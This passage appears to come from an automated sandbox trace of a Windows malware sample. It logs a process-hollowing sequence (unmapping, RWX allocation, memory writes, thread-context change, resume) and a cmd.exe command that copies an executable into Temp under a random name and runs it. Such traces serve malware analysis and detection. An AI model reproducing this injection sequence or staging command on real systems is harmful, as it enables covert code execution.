Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0112.517] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0112.517] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0112.517] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x214770*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214770*, lpNumberOfBytesWritten=0x0) returned 1 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x214b70, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x214b70*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214b70*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x269170*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x269170*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x2148a4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2148a4*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0112.524] ResumeThread (hThread=0x48) returned 0x1 [0112.524] CloseHandle (hObject=0x48) returned 1 [0112.524] CloseHandle (hObject=0x4c) returned 1 [0112.524] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.525] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0112.525] ExitProcess (uExitCode=0x0) Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7080 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7081 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7082 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7083 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7084 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7085 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7086 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7087 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7088 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 7089 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7247 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7248 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7249 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7250 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7251 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7252 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 7253 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7254 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7255 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7256 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7257 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7258 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7259 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7260 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7265 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 7266 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7267 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7268 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 7269 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 7270 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 7271 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7272 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7273 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 7274 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 7357 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 70 os_tid = 0xd6c [0112.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe54 | out: lpSystemTimeAsFileTime=0x28fe54*(dwLowDateTime=0x8121b6a0, dwHighDateTime=0x1d440a9)) [0112.616] GetCurrentProcessId () returned 0xd68 [0112.616] GetCurrentThreadId () returned 0xd6c [0112.616] GetTickCount () returned 0x26f84 [0112.616] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe4c | out: lpPerformanceCount=0x28fe4c*=16940520178) returned 1 [0112.616] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0112.617] __set_app_type (_Type=0x1) [0112.617] __p__fmode () returned 0x76b331f4 [0112.617] __p__commode () returned 0x76b331fc [0112.617] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0112.617] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0112.617] GetCurrentThreadId () returned 0xd6c [0112.617] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd6c) returned 0x38 [0112.617] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.617] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0112.617] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.617] 